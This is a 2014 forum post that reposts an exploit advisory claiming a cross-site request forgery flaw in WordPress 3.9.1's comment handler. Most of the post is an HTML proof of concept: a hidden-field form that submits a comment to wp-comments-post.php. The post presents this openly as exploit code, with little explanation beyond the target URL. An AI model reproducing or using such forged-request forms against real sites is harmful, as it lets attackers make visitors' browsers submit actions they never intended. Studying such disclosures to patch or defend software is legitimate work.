sensi Posted June 22, 2014 Report Posted June 22, 2014 # EXPLOIT TITLE:Wordpress 3.9.1-CSRF vulnerability# DATE:21st June,2014# Author:Avinash Kumar Thapa#URL: localhost/wordpress/#PATCH/FIX:Not fixed yet.###################################################################################################Technical Details:This is the new version released by Wordpress.version is 3.9.1(Latest)##Cross site request Forgery(CSRF) is present in this version at the url shown:http://localhost/wordpress/wp-comments-post.php#######################################################################################################Exploit Code:<html> <!-- CSRF PoC - generated by **Avinash Kumar Thapa** --> <body> <form action="http://localhost/wordpress/wp-comments-post.php" method="POST"> <input type="hidden" name="author" value="Anonymous" /> <input type="hidden" name="email" value="helloworld@outlook.com" /> <input type="hidden" name="url" value="www.random.com" /> <input type="hidden" name="comment" value="Cross site request Forgery(CSRF)" /> <input type="hidden" name="submit" value="Post Comment" /> <input type="hidden" name="comment_post_ID" value="1" /> <input type="hidden" name="comment_parent" value="0" /> <input type="submit" value="Submit form" /> </form> </body></html>###########################################################################################################------ Avinasha.k.a**SPID3R**twitter: @m_avinash143<https://twitter.com/m_avinash143>source Quote
